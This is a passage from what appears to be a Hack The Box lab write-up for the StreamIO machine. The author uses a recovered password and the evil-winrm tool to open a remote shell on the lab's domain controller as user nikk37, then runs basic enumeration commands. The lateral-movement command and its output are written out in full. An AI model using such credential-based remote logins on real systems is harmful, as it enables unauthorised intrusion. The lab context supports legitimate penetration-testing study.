nikk37


Using the credential of the nikk37 user, I can connect directly to the target system via WinRM:

┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ evil-winrm -i dc.streamio.htb -u nikk37 -p 'get_dem_girls2@yahoo.com'
 
Evil-WinRM shell v3.5
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\nikk37\Documents> whoami
streamio\nikk37
*evil-winrm* ps c:\Users\nikk37\Documents> hostname
DC
*evil-winrm* ps c:\Users\nikk37\Documents> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::243
   ipv6 address. . . . . . . . . . . : dead:beef::59b8:1082:6853:8e9
   link-local ipv6 address . . . . . : fe80::59b8:1082:6853:8e9%12
   ipv4 address. . . . . . . . . . . : 10.10.11.158
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%12
                                       10.10.10.2

Lateral movement to the nikk37 user was made via WinRM.